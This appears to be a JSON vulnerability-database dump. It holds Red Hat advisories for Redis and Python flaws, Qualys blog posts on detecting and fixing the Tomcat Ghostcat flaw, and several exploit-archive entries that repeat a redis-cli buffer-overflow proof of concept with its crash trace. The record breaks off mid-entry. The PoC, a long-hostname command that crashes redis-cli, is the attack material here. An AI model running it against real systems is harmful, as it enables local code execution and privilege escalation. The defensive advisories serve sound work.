(CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-16T21:51:00", "type": "redhat", "title": "(RHSA-2019:0052) Moderate: redis security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219", "CVE-2018-12326"], "modified": "2019-01-16T21:52:35", "id": "RHSA-2019:0052", "href": "https://access.redhat.com/errata/RHSA-2019:0052", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:37:25", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: code execution via a crafted command line (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-16T22:06:31", "type": "redhat", "title": "(RHSA-2019:0094) Moderate: redis security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219", "CVE-2018-12326"], "modified": "2019-01-16T22:35:11", "id": "RHSA-2019:0094", "href": "https://access.redhat.com/errata/RHSA-2019:0094", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:37:20", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap buffer overflow in HyperLogLog triggered by malicious client (CVE-2019-10192)\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: Code execution in redis-cli via crafted command line arguments (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-25T19:55:00", "type": "redhat", "title": "(RHSA-2019:1860) Important: rh-redis32-redis security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219", "CVE-2018-12326", "CVE-2019-10192"], "modified": "2019-07-25T20:02:37", "id": "RHSA-2019:1860", "href": "https://access.redhat.com/errata/RHSA-2019:1860", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:37:25", "description": "Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.\n\nSecurity Fix(es):\n\n* python: Information Disclosure due to urlsplit improper NFKC normalization (CVE-2019-9636)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-23T15:23:49", "type": "redhat", "title": "(RHSA-2019:0806) Important: python27-python security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9636"], "modified": "2019-04-23T15:31:43", "id": "RHSA-2019:0806", "href": "https://access.redhat.com/errata/RHSA-2019:0806", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "qualysblog": [{"lastseen": "2020-03-10T23:35:15", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1938"], "description": "As [previously reported](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/05/automatically-discover-prioritize-and-remediate-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-vmdr>), a severe vulnerability exists in Apache Tomcat\u2019s Apache JServ Protocol. The Chinese cyber security company Chaitin Tech [discovered the vulnerability](<https://www.chaitin.cn/en/ghostcat>), named \u201cGhostcat\u201d, which is tracked using [CVE-2020-1938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938>) and rated critical severity with a CVSS v3 score of 9.8.\n\nThis blog post details how web application security teams can detect this vulnerability using [Qualys Web Application Scanning (WAS)](<https://community.qualys.com/web-app-scanning/>). This new Qualys WAS detection complements [the detection](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/05/automatically-discover-prioritize-and-remediate-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-vmdr>) that uses [Qualys VMDR\u00ae](<https://www.qualys.com/subscriptions/vmdr/>).\n\n### About CVE-2020-1938\n\nApache Tomcat web servers are widely used for deploying Java-based web applications. [Apache JServ Protocol (AJP)](<https://en.wikipedia.org/wiki/Apache_JServ_Protocol>) is used for communication between Tomcat and Apache web server. This protocol is binary and is enabled by default. Anytime the web server is started, AJP protocol is started on port 8009. It is primarily used as a reverse proxy to communicate with application servers.\n\n[](<https://blog.qualys.com/wp-content/uploads/2020/03/was1.png>)\n\nThe most common way to identify whether the protocol is indeed enabled is to first locate the web server's conf/ directory. Look for the server.xml configuration file that specifies all the default protocols and the document root directory configuration. As you would learn through reading server.xml, connector port 8009 is not commented and is explicitly enabled by default.\n\n[](<https://blog.qualys.com/technology/2020/03/10/detect-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-was/attachment/was2-2>)\n\nThe Apache Tomcat AJP File Inclusion vulnerability (CVE-2020-1938) is exploitable only if port 8009 is exposed and AJP is installed.\n\nAffected Apache Tomcat versions will get reported under the Qualys WAS detection (see details of the detection below).\n\n * Apache Tomcat 9.0.0 to 9.0.30\n * Apache Tomcat 8.5.0 to 8.5.50\n * Apache Tomcat 7.0.0 to 7.0.99\n\n### Exploitability\n\nWith this vulnerability, an attacker can easily gain access to configuration files if the protocol is publicly available. If arbitrary file upload is not disabled, it is then possible for the attacker to upload malicious code to the web server that enables remote code execution.\n\nBelow is a report of the exploit:\n\n> You can read any webapps files or include a file to RCE .JUST A POC-GIF with no DETAILS\n> \n> Tomcat has fix this vulnerability ,UPDATE! [pic.twitter.com/Jauc5zPF3a](<https://t.co/Jauc5zPF3a>)\n> \n> \u2014 Henry Chen (@chybeta) [February 20, 2020](<https://twitter.com/chybeta/status/1230489154468732928?ref_src=twsrc%5Etfw>)\n\n### Identifying CVE-2020-1938 Vulnerability using WAS scan\n\nEnable QID 150282 in your Qualys WAS option profiles to identify if you are running a vulnerable version of Apache Tomcat. The WAS scan will report QID 150282 as a potential vulnerability. To keep it simple, our scan will not attempt to actively determine the vulnerability by uploading an arbitrary file. We take into consideration that AJP is a binary version of HTTP and could not be requested over HTTP, hence the detection of the vulnerable server is determined based on the presence of Tomcat version and the fact that it is shipped with default configurations.\n\n[](<https://blog.qualys.com/technology/2020/03/10/detect-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-was/attachment/was3-2>)\n\n### Additional Attack Vector\n\nWe also recommend to enable the following two QIDs in Qualys Web Application Scanning:\n\n * **150114**: Arbitrary File Upload\n * **150125**: File Upload Form Found\n\nThe vulnerability becomes more critical when the application allows file uploads. This will lead to the possibility of Remote Code Execution, allowing attacker to take complete take over of the web server. This requires immediate attention if you are using AJP and a vulnerable version of Apache Tomcat.\n\n### Remediation Guidance\n\nDisable port 8009 by commenting out (or deleting) the block of code that enables this vulnerability.\n\n[](<https://blog.qualys.com/technology/2020/03/10/detect-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-was/attachment/was4-2>)\n\nRestart Apache Web Server for changes to take effect.\n\n**RequiredSecret Attribute** \nRegardless of whether you disable AJP, we also recommend to define the strong secret key attribute requiredSecret in server.xml, which sets AJP protocol authentication credentials and ensures that only requests from authenticated workers will be honored. In this case, Tomcat will instantiate the AJP connector only when this attribute is specified with non-null and non-zero values. Note Tomcat documentation clearly states the default value for the attribute is null.\n\n**Upgrade Tomcat** \nIt is recommended to upgrade to patched versions of Apache Tomcat Web Servers:\n\n * Apache Tomcat version 9.0.31\n * Apache Tomcat version 8.5.51\n * Apache Tomcat version 7.0.100\n\nAdditional detection and remediation details are described in [Automatically Discover, Prioritize and Remediate Apache Tomcat AJP File Inclusion Vulnerability (CVE-2020-1938) using Qualys VMDR](<https://discussions.qualys.com/docs/DOC-7080-dashboard-toolbox-vm-dashboard-ghostcat-qid-87413-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938>).\n\n### References\n\n * <https://www.cisecurity.org/advisory/a-vulnerability-in-apache-tomcat-could-allow-for-arbitrary-file-reading-cve-2020-1938_2020-028/>\n * <https://tomcat.apache.org/tomcat-9.0-doc/config/ajp.html>", "modified": "2020-03-10T22:09:59", "published": "2020-03-10T22:09:59", "id": "QUALYSBLOG:0E0377FD948B0481F7D7DC678F26D14F", "href": "https://blog.qualys.com/technology/2020/03/10/detect-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-was", "type": "qualysblog", "title": "Detect Apache Tomcat AJP File Inclusion Vulnerability\u00a0(CVE-2020-1938) using Qualys WAS", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-06T05:34:42", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1938"], "description": "A severe vulnerability exists in Apache Tomcat\u2019s [Apache JServ Protocol](<https://en.wikipedia.org/wiki/Apache_JServ_Protocol>). The Chinese cyber security company Chaitin Tech [discovered the vulnerability](<https://www.chaitin.cn/en/ghostcat>), which is named \"Ghostcat\" and is tracked using [CVE-2020-1938](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938>). The security issue has received a critical severity rating score of 9.8 based on CVSS v3 Scoring system.\n\n**Vulnerability Details:** \nDue to a file inclusion defect in the AJP service (port 8009) that is enabled by default in Tomcat, an attacker can construct a malicious request package for file inclusion operation, and then read the web directory file on the affected Tomcat server. If the system allows users to upload files, an attacker can upload malicious code to the server, and gain the ability to perform remote code execution.\n\n**Affected Versions:** \nApache Tomcat 9.0.0 through 9.0.30 \nApache Tomcat 8.5.0 through 8.5.50 \nApache Tomcat 7.0.0 through 7.0.99\n\nThis vulnerability also affects Apache Tomcat 6; however, patches are not available for version 6.x. Customers are encouraged to upgrade to the latest supported versions of Apache Tomcat.\n\n### Identify Assets, Discover, Prioritize and Remediate using Qualys VMDR\u00ae\n\nQualys VMDR, all-in-one vulnerability management, detection and response enables: \n\n * Identification of known and unknown hosts running vulnerable Tomcat servers\n * Automatic detection of vulnerabilities and misconfigurations for Tomcat servers\n * Prioritization of threats based on risk\n * Integrated patch deployment for Windows hosts\n\n#### Identification of Assets with Apache Tomcat Installations\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of hosts with Tomcat Server with version information \u2013\n\n_software:(product:`Tomcat`)_\n\n\n\nAs Tomcat versions 6.x or below servers are at highest risk due to patch unavailability, you may want to search for these EOL\u2019ed versions by enhancing the search query, so that you can group them separately to take care of their risk.\n\n_software:(name:tomcat and version&lt;7.0.0) \nGroup by Software_\n\n\n\nUsing VMDR, you can also identify running Tomcat versions on the host via Qualys QID 86990 as shown below:\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 Tomcat. This helps in automatically grouping existing hosts with Tomcat servers as well as any new host spins up with Tomcat server. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover Tomcat Vulnerabilities and Misconfigurations\n\nNow that the hosts with Tomcat are identified, you want to detect which of these assets have flagged the CVE-2020-1938 vulnerability. VMDR automatically detects new vulnerabilities like CVE-2020-1938 based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for CVE-2020-1938 (or by Qualys ID: 87413) for your \u2018tomcat\u2019 asset tag in vulnerabilities view by using QQL query:\n\n_vulnerabilities.vulnerability.qid:87413 _ \n_vulnerabilities.vulnerability.cveIds:`CVE-2020-1938`_\n\nThis will return a list of all impacted hosts.\n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Tomcat AJP threat feed to see the vulnerability and impacted host details.\n\nWith VM Dashboard, you can track Tomcat vulnerabilities, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of Tomcat vulnerability trends in your environment using [Tomcat Vulnerabilities Dashboard](<https://discussions.qualys.com/docs/DOC-7080>) - \n\n\n\n\n**Configuration management adds context to overall vulnerability management**** ** \n\n\nTo overall reduce the security risk, it is important to take care of Tomcat misconfigurations as well. Qualys VMDR shows your Tomcat misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have Tomcat AJP vulnerability. It also shows Tomcat AJP misconfigurations, elevating the risk for these hosts compared to the hosts for which there may be a vulnerability but where the default port 8009 is not used or the configuration is already hardened. \n \nWith [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover \u2018running\u2019 Tomcat (multiple) instances and if they have misconfigurations in context to CVE-2020-1938 vulnerability.\n\n * Qualys configuration ID \u2013 16081 \u201cStatus of the \u2018protocol\u2019 setting within the \u2018server.xml\u2019 file\u201d would be evaluated against all running multiple instances to check if AJP connector is present in the result section as shown below -\n\n\n\n * Qualys configuration ID \u2013 17384 \u201cStatus of \u2018requiredSecret\u2019 setting in AJP Connector\u201d would be evaluated against all running multiple instances to see if \":xxxxxx\" value is not shown in the result section as below -\n\n\n\n#### \n\n#### Risk-Based Prioritization of Tomcat Vulnerability\n\nNow that you have identified the hosts, Tomcat versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on the risk, as each vulnerable asset might not pose the same risk. \n\n\n**High Risk****:**** **\n\n * Hosts with **Tomcat version 6.x or belo****w **should be upgraded. \nUse the query provided above in the identification phase to list hosts running Tomcat 6.x or below.\n * If due to the business reasons it is not possible to upgrade the hosts for which CVE-2020-1938 is detected and misconfigurations (CIDs 16081 and 17384 controls are failing) are detected for the auto-discovered running Tomcat instances as shown below-\n\nCID 16081 checks for AJP connector running on Tomcat server and evaluates misconfiguration based on the Tomcat AJP connector results.\n\n\n\nCID 17384 checks for \"requiredSecret\" value to be configured on the system, and evaluates misconfiguration based on \":xxxxxx\" value in the result.\n\n**Medium Risk:**\n\n * Hosts with Tomcat version 7.0 or above for which CVE-2020-1938 is detected, however, the Tomcat configurations for running instances are detected as hardened. \n\n \n\n\n### \nResponse by Patching and Remediation\n\nHosts with **Tomcat version 6.x or below **should be upgraded to later Tomcat versions as no patch is available for them.\n\nFor Tomcat versions 7.0 or above for which patch is available, VMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select Product: Tomcat\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 tomcat.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour \u201cPatch Window\u201d to ensure all hosts will continue to receive the required patches as new patches become available for the emerging vulnerabilities. Note: Tomcat patch on windows hosts requires a reboot.\n\n\n\nUsers are encouraged to apply patches as soon as possible.\n\nIn cases where due to business reasons, it is not possible to upgrade Tomcat 6.0 to later versions or for cases where patching or rebooting of servers is not possible, it is recommended that you reduce your security risk by remediating the related configuration settings for all running Tomcat servers as provided in [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) by applying following workarounds:\n\nDisable the AJP Connector directly, or change its listening address to the localhost as explained below-\n\n1\\. Change the AJP Protocol setting in server.xml fileEdit &lt;CATALINA_BASE&gt;/conf/server.xml, find the following line (&lt;CATALINA_BASE&gt; is the Tomcat work directory) and Comment out it (or just delete it)::\n\n_&lt;Connector port=\"8009\u2033 protocol=\"AJP/1.3\u2033 redirectPort=\"8443\u2033 /&gt; \n&lt;!-&lt;Connector port=\"8009\u2033 protocol=\"AJP/1.3\u2033 redirectPort=\"8443\u2033 /&gt;-&gt; _\n\nSave the edit, and then restart Tomcat. \n2\\. If AJP Connector service is in use, you can configure the \u201crequiredSecret\u201d attribute for the AJP Connector to set AJP protocol authentication credentials -\n\n_&lt;Connector port=\"8009\u2033 protocol=\"AJP/1.3\u2033 redirectPort=\"8443\u2033 address=\"YOUR_TOMCAT_IP_ADDRESS\" requiredSecret=\"YOUR_TOMCAT_AJP_SECRET\" /&gt;_\n\n### \n\n \n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical tomcat vulnerability CVE-2020-1938.", "modified": "2020-03-06T01:11:07", "published": "2020-03-06T01:11:07", "id": "QUALYSBLOG:BC451493BC4D8290B1A1CF86E18A6F98", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/05/automatically-discover-prioritize-and-remediate-apache-tomcat-ajp-file-inclusion-vulnerability-cve-2020-1938-using-qualys-vmdr", "type": "qualysblog", "title": "Automatically Discover, Prioritize and Remediate Apache Tomcat AJP File Inclusion Vulnerability (CVE-2020-1938) using Qualys VMDR", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-06-19T02:07:57", "description": "", "published": "2018-06-18T00:00:00", "type": "packetstorm", "title": "Redis-cli Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-12326"], "modified": "2018-06-18T00:00:00", "id": "PACKETSTORM:148225", "href": "https://packetstormsecurity.com/files/148225/Redis-cli-Buffer-Overflow.html", "sourceData": "`# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC) \n# Date: 2018-06-13 \n# Exploit Author: Fakhri Zulkifli \n# Vendor Homepage: https://redis.io/ \n# Software Link: https://redis.io/download \n# Version: 5.0, 4.0, 3.2 \n# Fixed on: 5.0, 4.0, 3.2 \n# CVE : CVE-2018-12326 \n \n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker \n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. \n \n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'` \nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known \n \n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 \n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 \n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 \n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 \n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 \n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148225/rediscli-overflow.txt"}], "exploitdb": [{"lastseen": "2018-06-18T20:26:52", "description": "Redis-cli < 5.0 - Buffer Overflow (PoC). CVE-2018-12326. Local exploit for Linux platform", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-18T00:00:00", "type": "exploitdb", "title": "Redis-cli < 5.0 - Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12326"], "modified": "2018-06-18T00:00:00", "id": "EDB-ID:44904", "href": "https://www.exploit-db.com/exploits/44904/", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Date: 2018-06-13\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n\r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n\r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n\r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)", "sourceHref": "https://www.exploit-db.com/download/44904/", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRedis-cli 5.0 - Buffer Overflow (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-18T00:00:00", "title": "Redis-cli 5.0 - Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12326"], "modified": "2018-06-18T00:00:00", "id": "EXPLOITPACK:9F45D8CAB6F6E66F98E43562AEAB5DE2", "href": "", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\n# Date: 2018-06-13\n# Exploit Author: Fakhri Zulkifli\n# Vendor Homepage: https://redis.io/\n# Software Link: https://redis.io/download\n# Version: 5.0, 4.0, 3.2\n# Fixed on: 5.0, 4.0, 3.2\n# CVE : CVE-2018-12326\n\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\n\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\nCould not connect to Redis at 